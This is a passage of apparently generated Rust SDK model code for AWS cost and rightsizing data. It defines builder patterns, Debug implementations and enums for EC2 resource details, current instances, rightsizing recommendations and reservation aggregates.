            }
        }
        /// Overwrites `network_performance` with a raw optional value; `None` clears it.
        pub fn set_network_performance(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                network_performance: value,
                ..self
            }
        }
        /// <p>The disk storage of the Amazon Web Services instance. This doesn't include EBS
        /// storage.</p>
        pub fn storage(self, value: impl Into<std::string::String>) -> Self {
            Self {
                storage: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `storage` with a raw optional value; `None` clears it.
        pub fn set_storage(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                storage: value,
                ..self
            }
        }
        /// <p> The number of VCPU cores in the Amazon Web Services instance type.</p>
        pub fn vcpu(self, value: impl Into<std::string::String>) -> Self {
            Self {
                vcpu: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `vcpu` with a raw optional value; `None` clears it.
        pub fn set_vcpu(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                vcpu: value,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
        pub fn build(self) -> crate::model::Ec2ResourceDetails {
            // Destructure once so every field is moved, not cloned.
            let Self {
                hourly_on_demand_rate,
                instance_type,
                platform,
                region,
                sku,
                memory,
                network_performance,
                storage,
                vcpu,
            } = self;
            crate::model::Ec2ResourceDetails {
                hourly_on_demand_rate,
                instance_type,
                platform,
                region,
                sku,
                memory,
                network_performance,
                storage,
                vcpu,
            }
        }
    }
}
impl Ec2ResourceDetails {
    /// Creates a new builder-style object to manufacture [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
    pub fn builder() -> crate::model::ec2_resource_details::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum RightsizingType {
    Modify,
    Terminate,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for RightsizingType {
    // Maps a wire-format string to a variant; unrecognized input is preserved in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "MODIFY" => Self::Modify,
            "TERMINATE" => Self::Terminate,
            unrecognized => Self::Unknown(unrecognized.to_owned()),
        }
    }
}
impl std::str::FromStr for RightsizingType {
    type Err = std::convert::Infallible;

    // Parsing can never fail: unrecognized input maps to `Unknown` via `From<&str>`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl RightsizingType {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Modify => "MODIFY",
            Self::Terminate => "TERMINATE",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all the wire-format values the enum was generated with.
    pub fn values() -> &'static [&'static str] {
        &["MODIFY", "TERMINATE"]
    }
}
impl AsRef<str> for RightsizingType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Context about the current instance.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CurrentInstance {
    /// <p>Resource ID of the current instance.</p>
    pub resource_id: std::option::Option<std::string::String>,
    /// <p>The name that you've given an instance. This field shows as blank if you haven't
    /// given the instance a name.</p>
    pub instance_name: std::option::Option<std::string::String>,
    /// <p>Cost allocation resource tags that are applied to the instance.</p>
    pub tags: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
    /// <p>Details about the resource and utilization.</p>
    pub resource_details: std::option::Option<crate::model::ResourceDetails>,
    /// <p>Utilization information of the current instance during the lookback period.</p>
    pub resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
    /// <p> The number of hours during the lookback period that's covered by reservations.</p>
    pub reservation_covered_hours_in_lookback_period: std::option::Option<std::string::String>,
    /// <p>The number of hours during the lookback period that's covered by Savings Plans.</p>
    pub savings_plans_covered_hours_in_lookback_period: std::option::Option<std::string::String>,
    /// <p> The number of hours during the lookback period that's billed at On-Demand
    /// rates.</p>
    pub on_demand_hours_in_lookback_period: std::option::Option<std::string::String>,
    /// <p>The total number of hours that the instance ran during the lookback period.</p>
    pub total_running_hours_in_lookback_period: std::option::Option<std::string::String>,
    /// <p>The current On-Demand cost of operating this instance on a monthly basis.</p>
    pub monthly_cost: std::option::Option<std::string::String>,
    /// <p> The currency code that Amazon Web Services used to calculate the costs for this
    /// instance.</p>
    pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CurrentInstance {
    // Renders every field through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CurrentInstance")
            .field("resource_id", &self.resource_id)
            .field("instance_name", &self.instance_name)
            .field("tags", &self.tags)
            .field("resource_details", &self.resource_details)
            .field("resource_utilization", &self.resource_utilization)
            .field(
                "reservation_covered_hours_in_lookback_period",
                &self.reservation_covered_hours_in_lookback_period,
            )
            .field(
                "savings_plans_covered_hours_in_lookback_period",
                &self.savings_plans_covered_hours_in_lookback_period,
            )
            .field(
                "on_demand_hours_in_lookback_period",
                &self.on_demand_hours_in_lookback_period,
            )
            .field(
                "total_running_hours_in_lookback_period",
                &self.total_running_hours_in_lookback_period,
            )
            .field("monthly_cost", &self.monthly_cost)
            .field("currency_code", &self.currency_code)
            .finish()
    }
}
/// See [`CurrentInstance`](crate::model::CurrentInstance)
pub mod current_instance {
    /// A builder for [`CurrentInstance`](crate::model::CurrentInstance)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) resource_id: std::option::Option<std::string::String>,
        pub(crate) instance_name: std::option::Option<std::string::String>,
        pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
        pub(crate) resource_details: std::option::Option<crate::model::ResourceDetails>,
        pub(crate) resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
        pub(crate) reservation_covered_hours_in_lookback_period:
            std::option::Option<std::string::String>,
        pub(crate) savings_plans_covered_hours_in_lookback_period:
            std::option::Option<std::string::String>,
        pub(crate) on_demand_hours_in_lookback_period: std::option::Option<std::string::String>,
        pub(crate) total_running_hours_in_lookback_period: std::option::Option<std::string::String>,
        pub(crate) monthly_cost: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>Resource ID of the current instance.</p>
        pub fn resource_id(self, value: impl Into<std::string::String>) -> Self {
            Self {
                resource_id: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `resource_id` with a raw optional value; `None` clears it.
        pub fn set_resource_id(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                resource_id: value,
                ..self
            }
        }
        /// <p>The name that you've given an instance. This field shows as blank if you haven't
        /// given the instance a name.</p>
        pub fn instance_name(self, value: impl Into<std::string::String>) -> Self {
            Self {
                instance_name: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `instance_name` with a raw optional value; `None` clears it.
        pub fn set_instance_name(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                instance_name: value,
                ..self
            }
        }
        /// Appends one tag to `tags`, creating the list on first use.
        pub fn tags(mut self, value: impl Into<crate::model::TagValues>) -> Self {
            self.tags.get_or_insert_with(Vec::new).push(value.into());
            self
        }
        /// Overwrites the whole `tags` list; `None` clears it.
        pub fn set_tags(
            self,
            value: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
        ) -> Self {
            Self { tags: value, ..self }
        }
        /// <p>Details about the resource and utilization.</p>
        pub fn resource_details(self, value: crate::model::ResourceDetails) -> Self {
            Self {
                resource_details: Some(value),
                ..self
            }
        }
        /// Overwrites `resource_details` with a raw optional value; `None` clears it.
        pub fn set_resource_details(
            self,
            value: std::option::Option<crate::model::ResourceDetails>,
        ) -> Self {
            Self {
                resource_details: value,
                ..self
            }
        }
        /// <p>Utilization information of the current instance during the lookback period.</p>
        pub fn resource_utilization(self, value: crate::model::ResourceUtilization) -> Self {
            Self {
                resource_utilization: Some(value),
                ..self
            }
        }
        /// Overwrites `resource_utilization` with a raw optional value; `None` clears it.
        pub fn set_resource_utilization(
            self,
            value: std::option::Option<crate::model::ResourceUtilization>,
        ) -> Self {
            Self {
                resource_utilization: value,
                ..self
            }
        }
        /// <p> The number of hours during the lookback period that's covered by reservations.</p>
        pub fn reservation_covered_hours_in_lookback_period(
            self,
            value: impl Into<std::string::String>,
        ) -> Self {
            Self {
                reservation_covered_hours_in_lookback_period: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `reservation_covered_hours_in_lookback_period`; `None` clears it.
        pub fn set_reservation_covered_hours_in_lookback_period(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                reservation_covered_hours_in_lookback_period: value,
                ..self
            }
        }
        /// <p>The number of hours during the lookback period that's covered by Savings Plans.</p>
        pub fn savings_plans_covered_hours_in_lookback_period(
            self,
            value: impl Into<std::string::String>,
        ) -> Self {
            Self {
                savings_plans_covered_hours_in_lookback_period: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `savings_plans_covered_hours_in_lookback_period`; `None` clears it.
        pub fn set_savings_plans_covered_hours_in_lookback_period(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                savings_plans_covered_hours_in_lookback_period: value,
                ..self
            }
        }
        /// <p> The number of hours during the lookback period that's billed at On-Demand
        /// rates.</p>
        pub fn on_demand_hours_in_lookback_period(
            self,
            value: impl Into<std::string::String>,
        ) -> Self {
            Self {
                on_demand_hours_in_lookback_period: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `on_demand_hours_in_lookback_period`; `None` clears it.
        pub fn set_on_demand_hours_in_lookback_period(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                on_demand_hours_in_lookback_period: value,
                ..self
            }
        }
        /// <p>The total number of hours that the instance ran during the lookback period.</p>
        pub fn total_running_hours_in_lookback_period(
            self,
            value: impl Into<std::string::String>,
        ) -> Self {
            Self {
                total_running_hours_in_lookback_period: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `total_running_hours_in_lookback_period`; `None` clears it.
        pub fn set_total_running_hours_in_lookback_period(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                total_running_hours_in_lookback_period: value,
                ..self
            }
        }
        /// <p>The current On-Demand cost of operating this instance on a monthly basis.</p>
        pub fn monthly_cost(self, value: impl Into<std::string::String>) -> Self {
            Self {
                monthly_cost: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `monthly_cost` with a raw optional value; `None` clears it.
        pub fn set_monthly_cost(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                monthly_cost: value,
                ..self
            }
        }
        /// <p> The currency code that Amazon Web Services used to calculate the costs for this
        /// instance.</p>
        pub fn currency_code(self, value: impl Into<std::string::String>) -> Self {
            Self {
                currency_code: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `currency_code` with a raw optional value; `None` clears it.
        pub fn set_currency_code(self, value: std::option::Option<std::string::String>) -> Self {
            Self {
                currency_code: value,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`CurrentInstance`](crate::model::CurrentInstance)
        pub fn build(self) -> crate::model::CurrentInstance {
            // Destructure once so every field is moved, not cloned.
            let Self {
                resource_id,
                instance_name,
                tags,
                resource_details,
                resource_utilization,
                reservation_covered_hours_in_lookback_period,
                savings_plans_covered_hours_in_lookback_period,
                on_demand_hours_in_lookback_period,
                total_running_hours_in_lookback_period,
                monthly_cost,
                currency_code,
            } = self;
            crate::model::CurrentInstance {
                resource_id,
                instance_name,
                tags,
                resource_details,
                resource_utilization,
                reservation_covered_hours_in_lookback_period,
                savings_plans_covered_hours_in_lookback_period,
                on_demand_hours_in_lookback_period,
                total_running_hours_in_lookback_period,
                monthly_cost,
                currency_code,
            }
        }
    }
}
impl CurrentInstance {
    /// Creates a new builder-style object to manufacture [`CurrentInstance`](crate::model::CurrentInstance)
    pub fn builder() -> crate::model::current_instance::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
/// <p>The summary of rightsizing recommendations </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationSummary {
    /// <p>The total number of instance recommendations.</p>
    pub total_recommendation_count: std::option::Option<std::string::String>,
    /// <p>The estimated total savings resulting from modifications, on a monthly basis.</p>
    pub estimated_total_monthly_savings_amount: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to calculate the savings.</p>
    pub savings_currency_code: std::option::Option<std::string::String>,
    /// <p> The savings percentage based on the recommended modifications. It's relative to the
    /// total On-Demand costs that are associated with these instances.</p>
    pub savings_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RightsizingRecommendationSummary {
    // Renders every summary field through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("RightsizingRecommendationSummary")
            .field("total_recommendation_count", &self.total_recommendation_count)
            .field(
                "estimated_total_monthly_savings_amount",
                &self.estimated_total_monthly_savings_amount,
            )
            .field("savings_currency_code", &self.savings_currency_code)
            .field("savings_percentage", &self.savings_percentage)
            .finish()
    }
}
/// See [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
pub mod rightsizing_recommendation_summary {
    /// A builder for [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) total_recommendation_count: std::option::Option<std::string::String>,
        pub(crate) estimated_total_monthly_savings_amount: std::option::Option<std::string::String>,
        pub(crate) savings_currency_code: std::option::Option<std::string::String>,
        pub(crate) savings_percentage: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The total number of instance recommendations.</p>
        pub fn total_recommendation_count(self, value: impl Into<std::string::String>) -> Self {
            Self {
                total_recommendation_count: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `total_recommendation_count`; `None` clears it.
        pub fn set_total_recommendation_count(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                total_recommendation_count: value,
                ..self
            }
        }
        /// <p>The estimated total savings resulting from modifications, on a monthly basis.</p>
        pub fn estimated_total_monthly_savings_amount(
            self,
            value: impl Into<std::string::String>,
        ) -> Self {
            Self {
                estimated_total_monthly_savings_amount: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `estimated_total_monthly_savings_amount`; `None` clears it.
        pub fn set_estimated_total_monthly_savings_amount(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                estimated_total_monthly_savings_amount: value,
                ..self
            }
        }
        /// <p>The currency code that Amazon Web Services used to calculate the savings.</p>
        pub fn savings_currency_code(self, value: impl Into<std::string::String>) -> Self {
            Self {
                savings_currency_code: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `savings_currency_code`; `None` clears it.
        pub fn set_savings_currency_code(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                savings_currency_code: value,
                ..self
            }
        }
        /// <p> The savings percentage based on the recommended modifications. It's relative to the
        /// total On-Demand costs that are associated with these instances.</p>
        pub fn savings_percentage(self, value: impl Into<std::string::String>) -> Self {
            Self {
                savings_percentage: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `savings_percentage`; `None` clears it.
        pub fn set_savings_percentage(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                savings_percentage: value,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
        pub fn build(self) -> crate::model::RightsizingRecommendationSummary {
            // Destructure once so every field is moved, not cloned.
            let Self {
                total_recommendation_count,
                estimated_total_monthly_savings_amount,
                savings_currency_code,
                savings_percentage,
            } = self;
            crate::model::RightsizingRecommendationSummary {
                total_recommendation_count,
                estimated_total_monthly_savings_amount,
                savings_currency_code,
                savings_percentage,
            }
        }
    }
}
impl RightsizingRecommendationSummary {
    /// Creates a new builder-style object to manufacture [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
    pub fn builder() -> crate::model::rightsizing_recommendation_summary::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
/// <p>Metadata for this recommendation set.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationMetadata {
    /// <p>The ID for this specific recommendation.</p>
    pub recommendation_id: std::option::Option<std::string::String>,
    /// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
    pub generation_timestamp: std::option::Option<std::string::String>,
    /// <p>The number of days of previous usage that Amazon Web Services considers when making
    /// this recommendation.</p>
    pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
    /// <p>Additional metadata that might be applicable to the recommendation.</p>
    pub additional_metadata: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RightsizingRecommendationMetadata {
    // Renders every metadata field through the standard `debug_struct` helper.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("RightsizingRecommendationMetadata")
            .field("recommendation_id", &self.recommendation_id)
            .field("generation_timestamp", &self.generation_timestamp)
            .field("lookback_period_in_days", &self.lookback_period_in_days)
            .field("additional_metadata", &self.additional_metadata)
            .finish()
    }
}
/// See [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
pub mod rightsizing_recommendation_metadata {
    /// A builder for [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) recommendation_id: std::option::Option<std::string::String>,
        pub(crate) generation_timestamp: std::option::Option<std::string::String>,
        pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
        pub(crate) additional_metadata: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The ID for this specific recommendation.</p>
        pub fn recommendation_id(self, value: impl Into<std::string::String>) -> Self {
            Self {
                recommendation_id: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `recommendation_id`; `None` clears it.
        pub fn set_recommendation_id(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                recommendation_id: value,
                ..self
            }
        }
        /// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
        pub fn generation_timestamp(self, value: impl Into<std::string::String>) -> Self {
            Self {
                generation_timestamp: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `generation_timestamp`; `None` clears it.
        pub fn set_generation_timestamp(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                generation_timestamp: value,
                ..self
            }
        }
        /// <p>The number of days of previous usage that Amazon Web Services considers when making
        /// this recommendation.</p>
        pub fn lookback_period_in_days(self, value: crate::model::LookbackPeriodInDays) -> Self {
            Self {
                lookback_period_in_days: Some(value),
                ..self
            }
        }
        /// Overwrites `lookback_period_in_days`; `None` clears it.
        pub fn set_lookback_period_in_days(
            self,
            value: std::option::Option<crate::model::LookbackPeriodInDays>,
        ) -> Self {
            Self {
                lookback_period_in_days: value,
                ..self
            }
        }
        /// <p>Additional metadata that might be applicable to the recommendation.</p>
        pub fn additional_metadata(self, value: impl Into<std::string::String>) -> Self {
            Self {
                additional_metadata: Some(value.into()),
                ..self
            }
        }
        /// Overwrites `additional_metadata`; `None` clears it.
        pub fn set_additional_metadata(
            self,
            value: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                additional_metadata: value,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
        pub fn build(self) -> crate::model::RightsizingRecommendationMetadata {
            // Destructure once so every field is moved, not cloned.
            let Self {
                recommendation_id,
                generation_timestamp,
                lookback_period_in_days,
                additional_metadata,
            } = self;
            crate::model::RightsizingRecommendationMetadata {
                recommendation_id,
                generation_timestamp,
                lookback_period_in_days,
                additional_metadata,
            }
        }
    }
}
impl RightsizingRecommendationMetadata {
    /// Creates a new builder-style object to manufacture [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
    pub fn builder() -> crate::model::rightsizing_recommendation_metadata::Builder {
        // `Builder` derives `Default`, so the zero-value builder is the start state.
        Default::default()
    }
}
/// <p>The aggregated numbers for your reservation usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationAggregates {
    /// <p>The percentage of reservation time that you used.</p>
    pub utilization_percentage: std::option::Option<std::string::String>,
    /// <p>The percentage of Amazon EC2 reservation time that you used. It's converted to
    /// normalized units. Normalized units are available only for Amazon EC2 usage after
    /// November 11, 2017.</p>
    pub utilization_percentage_in_units: std::option::Option<std::string::String>,
    /// <p>How many reservation hours that you purchased.</p>
    pub purchased_hours: std::option::Option<std::string::String>,
    /// <p>The number of Amazon EC2 reservation hours that you purchased. It's converted to
    /// normalized units. Normalized units are available only for Amazon EC2 usage after
    /// November 11, 2017.</p>
    pub purchased_units: std::option::Option<std::string::String>,
    /// <p>The total number of reservation hours that you used.</p>
    pub total_actual_hours: std::option::Option<std::string::String>,
    /// <p>The total number of Amazon EC2 reservation hours that you used. It's converted to
    /// normalized units. Normalized units are available only for Amazon EC2 usage after
    /// November 11, 2017.</p>
    pub total_actual_units: std::option::Option<std::string::String>,
    /// <p>The number of reservation hours that you didn't use.</p>
    pub unused_hours: std::option::Option<std::string::String>,
    /// <p>The number of Amazon EC2 reservation hours that you didn't use. It's converted to
    /// normalized units. Normalized units are available only for Amazon EC2 usage after
    /// November 11, 2017.</p>
    pub unused_units: std::option::Option<std::string::String>,
    /// <p>How much your reservation costs if charged On-Demand rates.</p>
    pub on_demand_cost_of_ri_hours_used: std::option::Option<std::string::String>,
    /// <p>How much you saved due to purchasing and utilizing reservation. Amazon Web Services
    /// calculates this by subtracting <code>TotalAmortizedFee</code> from
    /// <code>OnDemandCostOfRIHoursUsed</code>.</p>
    pub net_ri_savings: std::option::Option<std::string::String>,
    /// <p>How much you might save if you use your entire reservation.</p>
    pub total_potential_ri_savings: std::option::Option<std::string::String>,
    /// <p>The upfront cost of your reservation. It's amortized over the reservation
    /// period.</p>
    pub amortized_upfront_fee: std::option::Option<std::string::String>,
    /// <p>The monthly cost of your reservation. It's amortized over the reservation
    /// period.</p>
    pub amortized_recurring_fee: std::option::Option<std::string::String>,
    /// <p>The total cost of your reservation. It's amortized over the reservation period.</p>
    pub total_amortized_fee: std::option::Option<std::string::String>,
    /// <p>The cost of unused hours for your reservation.</p>
    pub ri_cost_for_unused_hours: std::option::Option<std::string::String>,
    /// <p>The realized savings because of purchasing and using a reservation.</p>
    pub realized_savings: std::option::Option<std::string::String>,
    /// <p>The unrealized savings because of purchasing and using a reservation.</p>
    pub unrealized_savings: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationAggregates {
    /// Renders every field through a single chained `debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationAggregates")
            .field("utilization_percentage", &self.utilization_percentage)
            .field(
                "utilization_percentage_in_units",
                &self.utilization_percentage_in_units,
            )
            .field("purchased_hours", &self.purchased_hours)
            .field("purchased_units", &self.purchased_units)
            .field("total_actual_hours", &self.total_actual_hours)
            .field("total_actual_units", &self.total_actual_units)
            .field("unused_hours", &self.unused_hours)
            .field("unused_units", &self.unused_units)
            .field(
                "on_demand_cost_of_ri_hours_used",
                &self.on_demand_cost_of_ri_hours_used,
            )
            .field("net_ri_savings", &self.net_ri_savings)
            .field(
                "total_potential_ri_savings",
                &self.total_potential_ri_savings,
            )
            .field("amortized_upfront_fee", &self.amortized_upfront_fee)
            .field("amortized_recurring_fee", &self.amortized_recurring_fee)
            .field("total_amortized_fee", &self.total_amortized_fee)
            .field("ri_cost_for_unused_hours", &self.ri_cost_for_unused_hours)
            .field("realized_savings", &self.realized_savings)
            .field("unrealized_savings", &self.unrealized_savings)
            .finish()
    }
}
/// See [`ReservationAggregates`](crate::model::ReservationAggregates)
pub mod reservation_aggregates {
    /// A builder for [`ReservationAggregates`](crate::model::ReservationAggregates)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) utilization_percentage: std::option::Option<std::string::String>,
        pub(crate) utilization_percentage_in_units: std::option::Option<std::string::String>,
        pub(crate) purchased_hours: std::option::Option<std::string::String>,
        pub(crate) purchased_units: std::option::Option<std::string::String>,
        pub(crate) total_actual_hours: std::option::Option<std::string::String>,
        pub(crate) total_actual_units: std::option::Option<std::string::String>,
        pub(crate) unused_hours: std::option::Option<std::string::String>,
        pub(crate) unused_units: std::option::Option<std::string::String>,
        pub(crate) on_demand_cost_of_ri_hours_used: std::option::Option<std::string::String>,
        pub(crate) net_ri_savings: std::option::Option<std::string::String>,
        pub(crate) total_potential_ri_savings: std::option::Option<std::string::String>,
        pub(crate) amortized_upfront_fee: std::option::Option<std::string::String>,
        pub(crate) amortized_recurring_fee: std::option::Option<std::string::String>,
        pub(crate) total_amortized_fee: std::option::Option<std::string::String>,
        pub(crate) ri_cost_for_unused_hours: std::option::Option<std::string::String>,
        pub(crate) realized_savings: std::option::Option<std::string::String>,
        pub(crate) unrealized_savings: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The percentage of reservation time that you used.</p>
        pub fn utilization_percentage(mut self, input: impl Into<std::string::String>) -> Self {
            self.utilization_percentage = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the percentage of reservation time that you used.
        pub fn set_utilization_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.utilization_percentage = input;
            self
        }
        /// <p>The percentage of Amazon EC2 reservation time that you used. It's converted to
        /// normalized units. Normalized units are available only for Amazon EC2 usage after
        /// November 11, 2017.</p>
        pub fn utilization_percentage_in_units(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.utilization_percentage_in_units = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the utilization percentage in normalized units.
        pub fn set_utilization_percentage_in_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.utilization_percentage_in_units = input;
            self
        }
        /// <p>How many reservation hours that you purchased.</p>
        pub fn purchased_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.purchased_hours = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) how many reservation hours you purchased.
        pub fn set_purchased_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.purchased_hours = input;
            self
        }
        /// <p>The number of Amazon EC2 reservation hours that you purchased. It's converted to
        /// normalized units. Normalized units are available only for Amazon EC2 usage after
        /// November 11, 2017.</p>
        pub fn purchased_units(mut self, input: impl Into<std::string::String>) -> Self {
            self.purchased_units = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the purchased hours in normalized units.
        pub fn set_purchased_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.purchased_units = input;
            self
        }
        /// <p>The total number of reservation hours that you used.</p>
        pub fn total_actual_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_actual_hours = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the total number of reservation hours used.
        pub fn set_total_actual_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_actual_hours = input;
            self
        }
        /// <p>The total number of Amazon EC2 reservation hours that you used. It's converted to
        /// normalized units. Normalized units are available only for Amazon EC2 usage after
        /// November 11, 2017.</p>
        pub fn total_actual_units(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_actual_units = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the used hours in normalized units.
        pub fn set_total_actual_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_actual_units = input;
            self
        }
        /// <p>The number of reservation hours that you didn't use.</p>
        pub fn unused_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.unused_hours = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the number of unused reservation hours.
        pub fn set_unused_hours(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.unused_hours = input;
            self
        }
        /// <p>The number of Amazon EC2 reservation hours that you didn't use. It's converted to
        /// normalized units. Normalized units are available only for Amazon EC2 usage after
        /// November 11, 2017.</p>
        pub fn unused_units(mut self, input: impl Into<std::string::String>) -> Self {
            self.unused_units = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the unused hours in normalized units.
        pub fn set_unused_units(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.unused_units = input;
            self
        }
        /// <p>How much your reservation costs if charged On-Demand rates.</p>
        pub fn on_demand_cost_of_ri_hours_used(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.on_demand_cost_of_ri_hours_used = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the On-Demand cost equivalent of the RI hours used.
        pub fn set_on_demand_cost_of_ri_hours_used(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_cost_of_ri_hours_used = input;
            self
        }
        /// <p>How much you saved due to purchasing and utilizing reservation. Amazon Web Services
        /// calculates this by subtracting <code>TotalAmortizedFee</code> from
        /// <code>OnDemandCostOfRIHoursUsed</code>.</p>
        pub fn net_ri_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.net_ri_savings = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the net reservation savings.
